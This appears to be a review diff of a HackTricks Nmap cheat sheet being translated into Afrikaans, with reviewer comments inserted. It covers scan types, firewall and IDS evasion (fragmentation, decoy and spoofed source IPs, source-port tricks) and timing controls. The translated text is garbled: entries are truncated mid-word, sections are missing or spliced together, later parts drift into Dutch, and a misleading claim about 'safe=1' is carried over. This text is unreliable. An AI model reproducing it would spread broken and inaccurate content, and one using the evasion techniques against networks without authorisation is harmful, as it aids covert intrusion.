* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-op
|
||||
|
|
|
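Review bot: the replacement footer block is cut off mid-word at `GitHub-op` (the English line it replaces ends with `github repos`) and, unlike the English block above it, it carries no closing `</details>`, so the translated page ends with a broken last bullet and an unclosed `<details>`; finish the line (e.g. `GitHub-opslag.`) and restore the `</details>` line. Two smaller translation slips in the same hunk: the mDNS bullet `mDNS-navrae is beperk tot die plaaslike netwerk en steek nie roetings nie` does not say "do not cross routers" (`roetings` is not the Afrikaans term for routers; `roeteerders`, or simply `routers`, would), and in the RADIUS paragraph `'n RADIUS-bedieners` pairs a singular article with a plural noun (`'n RADIUS-bediener`).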
@ -1,104 +1,87 @@
|
|||
# Nmap Summary (ESP)
|
||||
# Nmap Opsomming (ESP)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
```
|
||||
nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
### IPs to scan
|
||||
### IP's om te skandeer
|
||||
|
||||
* **`<ip>,<net/mask>`:** Indicate the ips directly
|
||||
* **`-iL <ips_file>`:** list\_IPs
|
||||
* **`-iR <number>`**: Number of random Ips, you can exclude possible Ips with `--exclude <Ips>` or `--excludefile <file>`.
|
||||
* **`<ip>,<net/mask>`:** Dui die IP's direk aan
|
||||
* **`-iL <ips_file>`:** lys_IPs
|
||||
* **`-iR <number>`**: Aantal lukrake IP's, jy kan moontlike IP's uitsluit met `--exclude <Ips>` of `--excludefile <file>`.
|
||||
|
||||
### Equipment discovery
|
||||
### Toerusting ontdekking
|
||||
|
||||
By default Nmap launches a discovery phase consisting of: `-PA80 -PS443 -PE -PP`
|
||||
Standaard lanceer Nmap 'n ontdekkingsfase wat bestaan uit: `-PA80 -PS443 -PE -PP`
|
||||
|
||||
* **`-sL`**: It is not invasive, it lists the targets making **DNS** requests to resolve names. It is useful to know if for example www.prueba.es/24 all Ips are our targets.
|
||||
* **`-Pn`**: **No ping**. This is useful if you know that all of them are active (if not, you could lose a lot of time, but this option also produces false negatives saying that they are not active), it prevents the discovery phase.
|
||||
* **`-sn`** : **No port scan**. After completing the reconnaissance phase, it does not scan ports. It is relatively stealthy, and allows a small network scan. With privileges it sends an ACK (-PA) to 80, a SYN(-PS) to 443 and an echo request and a Timestamp request, without privileges it always completes connections. If the target is the network, it only uses ARP(-PR). If used with another option, only the packets of the other option are dropped.
|
||||
* **`-PR`**: **Ping ARP**. It is used by default when analyzing computers in our network, it is faster than using pings. If you do not want to use ARP packets use `--send-ip`.
|
||||
* **`-PS <ports>`**: It sends SYN packets to which if it answers SYN/ACK it is open (to which it answers with RST so as not to end the connection), if it answers RST it is closed and if it does not answer it is unreachable. In case of not having privileges, a total connection is automatically used. If no ports are given, it throws it to 80.
|
||||
* **`-PA <ports>`**: Like the previous one but with ACK, combining both of them gives better results.
|
||||
* **`-PU <ports>`**: The objective is the opposite, they are sent to ports that are expected to be closed. Some firewalls only check TCP connections. If it is closed it is answered with port unreachable, if it is answered with another icmp or not answered it is left as destination unreachable.
|
||||
* **`-PE, -PP, -PM`** : ICMP PINGS: echo replay, timestamp and addresmask. They are launched to find out if the target is active.
|
||||
* **`-PY<ports>`**: Sends SCTP INIT probes to 80 by default, INIT-ACK(open) or ABORT(closed) or nothing or ICMP unreachable(inactive) can be replied.
|
||||
* **`-PO <protocols>`**: A protocol is indicated in the headers, by default 1(ICMP), 2(IGMP) and 4(Encap IP). For ICMP, IGMP, TCP (6) and UDP (17) protocols the protocol headers are sent, for the rest only the IP header is sent. The purpose of this is that due to the malformation of the headers, Protocol unreachable or responses of the same protocol are answered to know if it is up.
|
||||
* **`-n`**: No DNS
|
||||
* **`-R`**: DNS always
|
||||
* **`-sL`**: Dit is nie indringend nie, dit lys die teikens deur **DNS** navrae te maak om name op te los. Dit is nuttig om te weet of byvoorbeeld www.prueba.es/24 al die IP's ons teikens is.
|
||||
* **`-Pn`**: **Geen ping**. Dit is nuttig as jy weet dat almal aktief is (as nie, kan jy baie tyd verloor, maar hierdie opsie gee ook vals negatiewe resultate deur te sê dat hulle nie aktief is nie), dit voorkom die ontdekkingsfase.
|
||||
* **`-sn`** : **Geen poort skandering**. Nadat die verkenningsfase voltooi is, skandeer dit nie poorte nie. Dit is relatief stil en maak 'n klein netwerk skandering moontlik. Met voorregte stuur dit 'n ACK (-PA) na 80, 'n SYN(-PS) na 443 en 'n echo versoek en 'n Timestamp versoek, sonder voorregte voltooi dit altyd verbindings. As die teiken die netwerk is, gebruik dit slegs ARP(-PR). As dit saam met 'n ander opsie gebruik word, word slegs die pakkies van die ander opsie laat val.
|
||||
* **`-PR`**: **Ping ARP**. Dit word standaard gebruik wanneer rekenaars in ons netwerk geanaliseer word, dit is vinniger as om pings te gebruik. As jy nie ARP-pakkies wil gebruik nie, gebruik `--send-ip`.
|
||||
* **`-PS <ports>`**: Dit stuur SYN-pakkies na poorte waarop as dit antwoord met SYN/ACK dit oop is (waarop dit met RST antwoord om die verbinding nie te beëindig nie), as dit met RST antwoord is dit gesluit en as dit nie antwoord nie is dit onbereikbaar. In die geval van geen voorregte word 'n totale verbinding outomaties gebruik. As geen poorte gegee word, stuur dit dit na 80.
|
||||
* **`-PA <ports>`**: Soos die vorige een, maar met ACK, deur beide te kombineer gee dit beter resultate.
|
||||
* **`-PU <ports>`**: Die doel is die teenoorgestelde, dit word gestuur na poorte wat verwag word om gesluit te wees. Sommige vuurmuure kyk slegs na TCP-verbindings. As dit gesluit is, word daar met 'n onbereikbare poort geantwoord, as daar met 'n ander ICMP geantwoord word of nie geantwoord word nie, word dit as 'n onbereikbare bestemming gelaat.
|
||||
* **`-PE, -PP, -PM`** : ICMP PINGS: echo antwoord, tydmerk en adresmasker. Dit word geloods om uit te vind of die teiken aktief is.
|
||||
* **`-PY<ports>`**: Stuur SCTP INIT sondes na 80 standaard, INIT-ACK(oop) of ABORT(gesluit) of niks of ICMP onbereikbaar(inaktief) kan geantwoord word.
|
||||
* **`-PO <protocols>`**: 'n Protokol word aangedui in die koppe, standaard 1(ICMP), 2(IGMP) en 4(Encap IP). Vir ICMP, IGMP, TCP (6) en UDP (17) protokolle word die protokol koppe gestuur, vir die res word slegs die IP-kop gestuur. Die doel hiervan is dat as gevolg van die misvorming van die koppe, Protokol onbereikbaar of antwoorde van dieselfde protokol geantwoord word om te weet of dit aktief is.
|
||||
* **`-n`**: Geen DNS
|
||||
* **`-R`**: DNS altyd
|
||||
|
||||
### Port scanning techniques
|
||||
### Poort skandering tegnieke
|
||||
|
||||
* **`-sS`**: Does not complete the connection so it leaves no trace, very good if it can be used.(privileges) It is the one used by default.
|
||||
* **`-sT`**: Completes the connection, so it does leave a trace, but it can be used for sure. By default without privileges.
|
||||
* **`-sU`**: Slower, for UDP. Mostly: DNS(53), SNMP(161,162), DHCP(67 and 68), (-sU53,161,162,67,68): open(reply), closed(port unreachable), filtered (another ICMP), open/filtered (nothing). In case of open/filtered, -sV sends numerous requests to detect any of the versions that nmap supports and can detect the true state. It increases a lot the time.
|
||||
* **`-sY`**: SCTP protocol fails to establish the connection, so there are no logs, works like -PY
|
||||
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, they can penetrate some firewalls and extract information. They are based on the fact that standard compliant machines should respond with RST all requests that do not have SYN, RST or ACK lags raised: open/filtered(nothing), closed(RST), filtered (ICMP unreachable). Unreliable on WIndows, CIsco, BSDI and OS/400. On unix yes.
|
||||
* **`-sM`**: Maimon scan: Sends FIN and ACK flags, used for BSD, currently will return all as closed.
|
||||
* **`-sA, sW`**: ACK and Window, is used to detect firewalls, to know if the ports are filtered or not. The -sW does distinguish between open/closed since the open ones respond with a different window value: open (RST with window other than 0), closed (RST window = 0), filtered (ICMP unreachable or nothing). Not all computers work this way, so if it is all closed, it is not working, if it is a few open, it is working fine, and if it is many open and few closed, it is working the other way around.
|
||||
* **`-sI`:** Idle scan. For the cases in which there is an active firewall but we know that it does not filter to a certain Ip (or when we simply want anonymity) we can use the zombie scanner (it works for all the ports), to look for possible zombies we can use the scrpit ipidseq or the exploit auxiliary/scanner/ip/ipidseq. This scanner is based on the IPID number of the IP packets.
|
||||
* **`--badsum`:** It sends the sum wrong, the computers would discard the packets, but the firewalls could answer something, it is used to detect firewalls.
|
||||
* **`-sZ`:** "Weird" SCTP scanner, when sending probes with cookie echo fragments they should be dropped if open or responded with ABORT if closed. It can pass through firewalls that init does not pass through, the bad thing is that it does not distinguish between filtered and open.
|
||||
* **`-sO`:** Protocol Ip scan. Sends bad and empty headers in which sometimes not even the protocol can be distinguished. If ICMP unreachable protocol arrives it is closed, if unreachable port arrives it is open, if another error arrives, filtered, if nothing arrives, open|filtered.
|
||||
* **`-b <server>`:** FTPhost--> It is used to scan a host from another one, this is done by connecting the ftp of another machine and asking it to send files to the ports that you want to scan from another machine, according to the answers we will know if they are open or not. \[\<user>:\<password>@]\<server>\[:\<port>] Almost all ftps servers no longer let you do this and therefore it is of little practical use.
|
||||
|
||||
### **Centrar análisis**
|
||||
|
||||
**-p:** Sirve para dar los puertos a escanear. Para seleccionar los 65335: **-p-** o **-p all**. Nmap tiene una clasificaación interna según su popularidad. Por defecto usa los 1000 ppales. Con **-F** (fast scan) analiza los 100 ppales. Con **--top-ports \<numero>** Analiza ese numero de ppales (de 1 hasta los 65335). Comprueba los puertos en orden aleatorio, para que eso no pase **-r**. También podemos seleccionar puertos: 20-30,80,443,1024- Esto ultimo significa que mire en adelante del 1024. También podemos agrupar los puertos por protocolos: U:53,T:21-25,80,139,S:9. También podemos escoger un rango dentro de los puertos populares de nmap: -p \[-1024] analiza hasta el 1024 de los incluidos en nmap-services. **--port-ratio \<ratio>** Analiza los puertos más comúnes que un ratio que debe estar entre 0 y 1
|
||||
|
||||
**-sV** Escaneado de versión, se puede regular la intensidad de 0 a 9, por defecto 7.
|
||||
|
||||
**--version-intensity \<numero>** Regulamos la intensidad, de forma que cuanto más bajo solo lanzará las sondas más probables, pero no todas. Con esto podemos acortar considerablemente el tiempo de escaneo UDP
|
||||
|
||||
**-O** Deteccion de os
|
||||
|
||||
**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os (ahorra tiempo)
|
||||
|
||||
**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más
|
||||
* **`-sS`**: Voltooi nie die verbinding nie, so dit laat geen spoor agter nie, baie goed as dit gebruik kan word.(voorregte) Dit is die een wat standaard gebruik word.
|
||||
* **`-sT`**: Voltooi die verbinding, so dit laat 'n spoor agter, maar dit kan veilig gebruik word. Standaard sonder voorregte.
|
||||
* **`-sU`**: Stadiger, vir UDP. Meestal: DNS(53), SNMP(161,162), DHCP(67 en 68), (-sU53,161,162,67,68): oop(antwoord), gesluit(poort onbereikbaar), gefiltreer (ander ICMP), oop/gefiltreer (niks). In die geval van oop/gefiltreer, stuur -sV talle versoek om enige van die weergawes wat nmap ondersteun op te spoor en die ware toestand te bepaal. Dit verhoog die tyd aansienlik.
|
||||
* **`-sY`**: SCTP-protokol slaag nie daarin om die verbinding te vestig nie, so daar is geen logboeke nie, werk soos -PY
|
||||
* **`-sN,-sX,-sF`:** Null, Fin, Xmas, hulle kan deur sommige vuurmuure dring en inligting onttrek. Dit is gebaseer op die feit dat standaard voldoenende masjiene met RST op alle versoek wat nie SYN, RST of ACK vlae het nie moet antwoord: oop/gefiltreer(niks), gesluit(RST), gefiltreer (ICMP onbereikbaar). Onbetroubaar op Windows, CIsco, BSDI en OS/400. Op Unix wel.
|
||||
* **`-sM`**: Maimon skandering: Stuur FIN- en ACK-vlae, gebruik vir BSD, tans sal dit alles as gesluit terugkeer.
|
||||
* **`-sA, sW`**: ACK en Window, word gebruik om vuurmuure op te spoor, om te weet of die poorte gefiltreer word of nie. Die -sW onderskei tussen oop/gesluit aangesien die oop een met 'n ander vensterwaarde antwoord: oop (RST met venster anders as 0), gesluit (RST-venster = 0), gefiltreer (ICMP onbereikbaar of niks). Nie alle rekenaars werk op hierdie manier nie, so as dit alles gesluit is, werk dit nie, as dit 'n paar oop is, werk dit goed, en as dit baie oop en min gesluit is, werk dit die ander kant toe.
|
||||
* **`-sI`:** Idle skandering. Vir gevalle waar daar 'n aktiewe vuurmuur is, maar ons weet dat dit nie na 'n sekere IP filter nie (of wanneer ons eenvoudig anonimiteit wil hê), kan ons die zombie skanderingsinstrument gebruik (dit werk vir alle poorte), om moontlike zombies te soek, kan ons die ipidseq skrip of die exploit auxiliary/scanner/ip/ipidseq gebruik. Hierdie skanderingsinstrument is gebaseer op die IPID-nommer van die IP-pakkies.
|
||||
* **`--badsum`:** Dit stuur die som verkeerd, die rekenaars sal die pakkies verwerp, maar die vuurmuure kan iets antwoord, dit word gebruik om vuurmuure op te spoor.
|
||||
* **`-sZ`:** "Vreemde" SCTP-skanderingsinstrument, wanneer sondes met koekie-echo-fragmente gestuur word, moet dit laat val word as dit oop is of met ABORT geantwoord word as dit gesluit is. Dit kan deur vuurmuure gaan waardeur init nie kan gaan nie
|
||||
**--osscan-guess** Wanneer OS-detectie niet perfect is, zorgt dit ervoor dat er meer inspanning wordt geleverd.
|
||||
|
||||
**Scripts**
|
||||
|
||||
\--script _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_\[,...]
|
||||
|
||||
Para usar los de por efecto vale con -sC o --script=default
|
||||
Om de standaardscripts te gebruiken, volstaat het om -sC of --script=default te gebruiken.
|
||||
|
||||
Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln
|
||||
De beschikbare categorieën zijn: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version en vuln.
|
||||
|
||||
* **Auth:** ejecuta todos sus _scripts_ disponibles para autenticación
|
||||
* **Default:** ejecuta los _scripts_ básicos por defecto de la herramienta
|
||||
* **Discovery:** recupera información del _target_ o víctima
|
||||
* **External:** _script_ para utilizar recursos externos
|
||||
* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_
|
||||
* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ (puertas traseras)
|
||||
* **Safe:** ejecuta _scripts_ que no son intrusivos
|
||||
* **Vuln:** descubre las vulnerabilidades más conocidas
|
||||
* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles
|
||||
* **Auth:** voert alle beschikbare scripts uit voor authenticatie.
|
||||
* **Default:** voert de standaard basis scripts van de tool uit.
|
||||
* **Discovery:** haalt informatie op van het doelwit of slachtoffer.
|
||||
* **External:** script om externe bronnen te gebruiken.
|
||||
* **Intrusive:** gebruikt scripts die als indringend worden beschouwd voor het doelwit of slachtoffer.
|
||||
* **Malware:** controleert of er open verbindingen zijn door kwaadaardige code of achterdeuren.
|
||||
* **Safe:** voert scripts uit die niet indringend zijn.
|
||||
* **Vuln:** ontdekt de meest bekende kwetsbaarheden.
|
||||
* **All:** voert alle beschikbare NSE-scripts uit.
|
||||
|
||||
Para buscar scripts:
|
||||
Om scripts te zoeken:
|
||||
|
||||
**nmap --script-help="http-\*" -> Los que empiecen por http-**
|
||||
**nmap --script-help="http-\*" -> Die wat met http- begin**
|
||||
|
||||
**nmap --script-help="not intrusive" -> Todos menos esos**
|
||||
**nmap --script-help="not intrusive" -> Alles behalwe dit**
|
||||
|
||||
**nmap --script-help="default or safe" -> Los que estan en uno o en otro o en ambos**
|
||||
**nmap --script-help="default or safe" -> Die in een van beide of beide categorieën vallen**
|
||||
|
||||
**nmap --script-help="default and safe" --> Los que estan en ambos**
|
||||
**nmap --script-help="default and safe" --> Die in beide categorieën vallen**
|
||||
|
||||
**nmap --script-help="(default or safe or intrusive) and not http-\*"**
|
||||
|
||||
|
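Review bot: the translated block drops content that the English/Spanish side still has: the `-sZ` entry stops at `waardeur init nie kan gaan nie` (its closing sentence about not distinguishing filtered from open is gone), the `-sO` and `-b <server>` entries have no counterpart, and the whole `### **Centrar análisis**` section (`-p`, `-sV`, `--version-intensity`, `-O`, `--osscan-limit`) is missing, which matches the hunk header shrinking from 104 to 87 lines; this looks like a truncated translation output, and the missing entries should be restored before merging. Also, from `**--osscan-guess** Wanneer OS-detectie niet perfect is` onward the new text is Dutch rather than Afrikaans (`Om de standaardscripts te gebruiken`, `De beschikbare categorieën zijn`), inconsistent with the Afrikaans used in the first half of the same hunk (`Poort skandering tegnieke`, `Geen ping`) and with the commit's stated target language.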
@ -108,43 +91,43 @@ Para buscar scripts:
|
|||
|
||||
\--script-help _\<filename>_|_\<category>_|_\<directory>_|_\<expression>_|all\[,...]
|
||||
|
||||
\--script-trace ---> Da info de como va elscript
|
||||
\--script-trace ---> Geeft informatie over de voortgang van het script.
|
||||
|
||||
\--script-updatedb
|
||||
|
||||
**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --> Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros.
|
||||
Om een script te gebruiken, hoef je alleen maar het volgende in te voeren: nmap --script Naam\_van\_script doelwit --> Door het script op te geven, wordt zowel het script als de scanner uitgevoerd. Je kunt ook scanneropties toevoegen, zoals "safe=1", zodat alleen veilige scripts worden uitgevoerd.
|
||||
|
||||
**Control tiempo**
|
||||
**Tijdbeheer**
|
||||
|
||||
**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing.
|
||||
**Nmap kan de tijd in seconden, minuten, ms aanpassen:** --host-timeout arguments 900000ms, 900, 900s en 15m doen allemaal hetzelfde.
|
||||
|
||||
Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque (y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256.
|
||||
Nmap verdeelt het totale aantal te scannen hosts in groepen en analyseert deze groepen in blokken, zodat het pas naar het volgende blok gaat nadat alle hosts zijn geanalyseerd (en de gebruiker ontvangt ook geen updates totdat het blok is geanalyseerd). Op deze manier is het voor Nmap efficiënter om grote groepen te gebruiken. Standaard gebruikt het 256 voor klasse C.
|
||||
|
||||
Se puede cambiar con\*\*--min-hostgroup\*\* _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Adjust parallel scan group sizes)
|
||||
Dit kan worden gewijzigd met **--min-hostgroup** _**\<numhosts>**_**;** **--max-hostgroup** _**\<numhosts>**_ (Pas de grootte van parallelle scantaken aan)
|
||||
|
||||
Se puede controlar el numero de escaners en paralelo pero es mejor que no (nmpa ya incorpora control automatico en base al estado de la red): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
Het aantal parallelle scanners kan worden gecontroleerd, maar het is beter om dit niet te doen (Nmap heeft al automatische controle op basis van de netwerkstatus): **--min-parallelism** _**\<numprobes>**_**;** **--max-parallelism** _**\<numprobes>**_
|
||||
|
||||
Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
We kunnen de RTT-timeout aanpassen, maar dit is meestal niet nodig: **--min-rtt-timeout** _**\<time>**_**,** **--max-rtt-timeout** _**\<time>**_**,** **--initial-rtt-timeout** _**\<time>**_
|
||||
|
||||
Podemos modificar el numero de intentos:**--max-retries** _**\<numtries>**_
|
||||
We kunnen het aantal pogingen aanpassen: **--max-retries** _**\<numtries>**_
|
||||
|
||||
Podemos modificar el tiempo de escaneado de un host: **--host-timeout** _**\<time>**_
|
||||
We kunnen de scantijd voor een host aanpassen: **--host-timeout** _**\<time>**_
|
||||
|
||||
Podemos modificar el tiempo entre cada prueba para que vaya despacio: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
|
||||
We kunnen de tijd tussen elke probe aanpassen om het langzamer te laten verlopen: **--scan-delay** _**\<time>**_**;** **--max-scan-delay** _**\<time>**_
|
||||
|
||||
Podemos modificar el numero de paquetes por segundo: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
|
||||
We kunnen het aantal pakketten per seconde aanpassen: **--min-rate** _**\<number>**_**;** **--max-rate** _**\<number>**_
|
||||
|
||||
Muchos puertos tardan mucho en responder al estar filtrados o cerrados, si solo nos interesan los abiertos, podemos ir más rápido con: **--defeat-rst-ratelimit**
|
||||
Veel poorten reageren traag als ze gefilterd of gesloten zijn. Als we alleen geïnteresseerd zijn in open poorten, kunnen we sneller scannen met: **--defeat-rst-ratelimit**
|
||||
|
||||
Para definir lo agresivo que queremos que sea nmap: -T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
Om de agressiviteit van Nmap in te stellen: -T paranoid|sneaky|polite|normal|aggressive|insane
|
||||
|
||||
\-T (0-1)
|
||||
|
||||
\-T0 --> Solo se escanea 1 puerto a la vez y se espera 5min hasta el siguiente
|
||||
\-T0 --> Er wordt slechts één poort tegelijk gescand en er wordt 5 minuten gewacht voordat de volgende wordt gescand.
|
||||
|
||||
\-T1 y T2 --> Muy parecidos pero solo esperan 15 y 0,4seg respectivamente enttre cada prueba
|
||||
\-T1 en T2 --> Zeer vergelijkbaar, maar wachten respectievelijk 15 en 0,4 seconden tussen elke probe.
|
||||
|
||||
\-T3 --> Funcionamiento por defecto, incluye en paralelo
|
||||
\-T3 --> Standaard werking, inclusief parallelle scans.
|
||||
|
||||
\-T4 --> --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
|
||||
|
||||
|
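Review bot: the line "Je kunt ook scanneropties toevoegen, zoals "safe=1", zodat alleen veilige scripts worden uitgevoerd" (the translation of the `nmap --script Nombre_del_script objetivo` paragraph) carries over a misleading claim: `safe=1` is not a global Nmap switch that limits execution to safe scripts; categories are selected with `--script safe` or `--script "default and safe"`, and `safe=1` is only a per-script argument passed through `--script-args` for the few scripts that honour it. Suggest rewording the sentence to point at the category selector. The replacement lines in this hunk ("Tijdbeheer", "We kunnen de RTT-timeout aanpassen", "Het aantal parallelle scanners kan worden gecontroleerd") are also Dutch, not Afrikaans, so the target language is inconsistent within the file.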
@ -152,91 +135,80 @@ Para definir lo agresivo que queremos que sea nmap: -T paranoid|sneaky|polite|no
|
|||
|
||||
**Firewall/IDS**
|
||||
|
||||
No dejan pasar a puertos y analizan paquetes.
|
||||
Ze blokkeren poorten en analyseren pakketten.
|
||||
|
||||
**-f** Para fragmentar paquetes, por defecto los fragmenta en 8bytes después de la cabecera, para especificar ese tamaño usamos ..mtu (con esto, no usar -f), el offset debe ser multiplo de 8. **Escaners de version y scripts no soportan la fragmentacion**
|
||||
**-f** Om pakketten te fragmenteren, worden ze standaard gefragmenteerd in blokken van 8 bytes na de header. Om de grootte op te geven, gebruiken we ..mtu (in plaats van -f). De offset moet een veelvoud van 8 zijn. **Versie-scanners en scripts ondersteunen geen fragmentatie.**
|
||||
|
||||
**-D decoy1,decoy2,ME** Nmap envia escaneres pero con otras direcciones IPs como origen, de esta forma te esconden a ti. Si pones el ME en la lista, nmap te situara ahi, mejor poner 5 o 6 antes de ti para que te enmascaren completamente. Se pueden generar iPs aleatorias con RND:\<numero> Para generar \<numero> de Ips aleatorias. No funcionan con detector de versiones sin conexion de TCP. Si estas dentro de una red, te interesa usar Ips que esten activas, pues sino será muy facil averiguar que tu eres la unica activa.
|
||||
**-D decoy1,decoy2,ME** Nmap stuurt scans met andere IP-adressen als bron, waardoor je verborgen blijft. Als je ME in de lijst plaatst, zal Nmap je daar plaatsen. Het is beter om 5 of 6 adressen voor jezelf te plaatsen om volledig verborgen te blijven. Je kunt willekeurige IP-adressen genereren met RND:\<nummer> om een bepaald aantal willekeurige IP-adressen te genereren. Ze werken niet met offline TCP-versiedetectie. Als je je binnen een netwerk bevindt, is het handig om IP-adressen te gebruiken die actief zijn, anders is het gemakkelijk te achterhalen dat jij de enige actieve bent.
|
||||
|
||||
Para usar Ips aleatorias: nmap-D RND: 10 Ip\_objetivo
|
||||
Om willekeurige IP-adressen te gebruiken: nmap -D RND:10 Doel_IP
|
||||
|
||||
**-S IP** Para cuando Nmap no pilla tu dirección Ip se la tienes que dar con eso. También sirve para hacer pensar que hay otro objetivo escaneandoles.
|
||||
**-S IP** Als Nmap je IP-adres niet kan achterhalen, moet je het opgeven met deze optie. Het kan ook worden gebruikt om te laten denken dat er een ander doelwit hen scant.
|
||||
|
||||
**-e \<interface>** Para elegir la interfaz
|
||||
**-e \<interface>** Om de interface te kiezen.
|
||||
|
||||
Muchos administradores dejan puertos de entrada abiertos para que todo funcione correctamente y les es más fácil que buscar otra solución. Estos pueden ser los puertos DNS o los de FTP... para busca esta vulnerabilidad nmap incorpora: **--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ _Son equivalentes_
|
||||
Veel beheerders laten ingangspoorten open zodat alles correct werkt en het gemakkelijker is dan naar een andere oplossing te zoeken. Dit kunnen bijvoorbeeld DNS-poorten of FTP-poorten zijn. Om deze kwetsbaarheid te vinden, heeft Nmap: **--source-port** _**\<portnumber>**_**;-g** _**\<portnumber>**_ (ze zijn equivalent).
|
||||
|
||||
**--data** _**\<hex string>**_ Para enviar texto hexadecimal: --data 0xdeadbeef and --data \xCA\xFE\x09
|
||||
**--data** _**\<hex string>**_ Om hexadecimale tekst te verzenden: --data 0xdeadbeef en --data \xCA\xFE\x09
|
||||
|
||||
**--data-string** _**\<string>**_ Para enviar un texto normal: --data-string "Scan conducted by Security Ops, extension 7192"
|
||||
**--data-string** _**\<string>**_ Om normale tekst te verzenden: --data-string "Scan conducted by Security Ops, extension 7192"
|
||||
|
||||
**--data-length** _**\<number>**_ Nmap envía solo cabeceras, con esto logramos que añada a estar un numero de bytes mas (que se generaran aleatoriamente)
|
||||
**--data-length** _**\<number>**_ Nmap stuurt alleen headers, met deze optie kunnen we een bepa
|
||||
**--proxies** _**\<Komma-geskeide lys van proxy-URL's>**_ Om proxies te gebruik, is dit soms nodig om die parallelisme aan te pas as 'n proxy nie soveel oop verbindinge toelaat soos wat nmap wil hê nie: --max-parallelism
|
||||
|
||||
Para configurar el paquete IP completamente usar **--ip-options**
|
||||
**-sP** Om gasheer in die netwerk te ontdek deur ARP
|
||||
|
||||
If you wish to see the options in packets sent and received, specify --packet-trace. For more information and examples of using IP options with Nmap, see [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52).
|
||||
Baie administrateurs skep 'n reël in die vuurmuur wat alle pakkies van 'n spesifieke poort (soos 20, 53 en 67) toelaat om deur te gaan. Ons kan nmap instrueer om ons pakkies van daardie poorte af te stuur: **nmap --source-port 53 Ip**
|
||||
|
||||
**--ttl** _**\<value>**_
|
||||
**Uitsette**
|
||||
|
